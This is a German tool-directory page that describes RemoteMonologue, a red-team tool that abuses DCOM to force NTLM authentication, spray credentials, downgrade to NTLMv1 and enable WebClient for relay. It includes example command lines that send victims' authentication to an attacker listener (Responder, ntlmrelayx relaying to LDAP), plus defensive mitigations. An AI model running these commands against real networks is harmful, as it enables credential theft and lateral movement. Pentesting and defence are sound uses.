Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RemoteMonologue — Bewaffnung von DCOM für NTLM-Authentifizierungs-Coercions | Kitploit
Tools/GitHubGitHub/xforcered/remotemonologue
PasswortangriffeExploitationLaterale BewegungInformationsbeschaffungPenetrationstestsRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

Bewaffnung von DCOM für NTLM-Authentifizierungs-Coercions

Repository anzeigen
2752213vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RemoteMonologue

RemoteMonologue ist eine Technik zum Sammeln von Windows-Anmeldeinformationen (Credential Harvesting), die eine Remote-Kompromittierung von Benutzern ermöglicht, indem sie den RunAs-Schlüssel des interaktiven Benutzers ausnutzt und über DCOM NTLM-Authentifizierungen erzwingt.

Lies X-Force Reds RemoteMonologue: DCOM als Waffe für NTLM-Authentifizierungs-Erzwingungen einsetzen für detaillierte Informationen.

Features

🔹 Authentifizierungs-Erzwingung über DCOM (-dcom)

  • Zielt auf vier DCOM-Objekte (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession), um eine NTLM-Authentifizierung gegen einen angegebenen Listener (-auth-to) auszulösen.

🔹 Credential Spraying (-spray)

  • Validiert Anmeldeinformationen über mehrere Systeme hinweg und erfasst dabei auch Benutzeranmeldedaten.

🔹 NetNTLMv1-Downgrade-Angriff (-downgrade)

  • Zwingt Zielsysteme zur Verwendung von NTLMv1, was das Knacken und die Weiterleitung von Anmeldeinformationen erleichtert.

🔹 Missbrauch des WebClient-Dienstes (-webclient)

  • Aktiviert den WebClient-Dienst, um HTTP-basierte Authentifizierungs-Erzwingung zu ermöglichen.

🔹 Benutzer-Enumeration (-query)

  • Ermittelt Benutzer mit einer aktiven Sitzung auf dem Zielsystem.

Hinweis: Lokale Administratorrechte auf dem Zielsystem sind erforderlich.

Einrichtung

root@kitploit:~
pip install impacket

Beispiele

Im Folgenden findest du ein Beispiel für die Ausführung von RemoteMonologue mit dem NetNTLMv1-Downgrade-Angriff, bei dem Responder als Listener verwendet wird. Standardmäßig verwendet das Tool das DCOM-Objekt ServerDataCollectorSet, wenn keine DCOM-Option angegeben ist.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

Im Folgenden ein weiteres Beispiel: Diesmal wird der Angriff unter Verwendung des DCOM-Objekts FileSystemImage ausgeführt und der WebClient-Dienst aktiviert, um eine HTTP-Authentifizierung zu erhalten, die anschließend mit ntlmrelayx an LDAP weitergeleitet wird.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Überlegungen zur Verteidigung

Um sich vor diesen Techniken zu schützen und sie zu erkennen, können verschiedene Präventiv- und Erkennungsmaßnahmen implementiert werden.

Präventive Maßnahmen:

  1. LDAP-Signierung und Kanalbindung aktivieren: Konfiguriere die Erzwingung von LDAP-Signierung und Kanalbindung auf Domänencontrollern, um den LDAP-Endpunkt vor Relay-Angriffen zu schützen. Hinweis: Diese Einstellungen werden ab Windows Server 2025 standardmäßig erzwungen.

  2. Auf die neuesten Windows-Versionen aktualisieren: Aktualisiere Server auf Windows Server 2025 und Arbeitsstationen auf Windows 11 Version 24H2, um NetNTLM-Downgrade-Angriffe abzuschwächen, da NTLMv1 in diesen Versionen entfernt wurde.

  3. SMB-Signierung erzwingen: Aktiviere und erzwinge die SMB-Signierung auf Windows-Servern, um SMB-Relay-Angriffe zu verhindern.

  4. Starke Passwortrichtlinien implementieren: Erzwinge strenge Passwortanforderungen, um Passwort-Cracking-Angriffe zu erschweren.

Erkennungsmöglichkeiten:

  1. Remote-Zugriff auf DCOM-Objekte überwachen: Verfolge den Zugriff auf die betroffenen DCOM-Objekte sowie ihre spezifischen Eigenschaften und Methoden, um ungewöhnliche Aktivitäten zu identifizieren.

  2. Registrierungsänderungen überwachen: Überwache Änderungen an den Registrierungsschlüsseln RunAs und LmCompatibilityLevel.

  3. WebClient-Dienstaktivität verfolgen: Überwache Fälle, in denen der WebClient-Dienst remote aktiviert wird, da dieser zur Ermöglichung HTTP-basierter NTLM-Authentifizierungen genutzt wird.

Tool herunterladen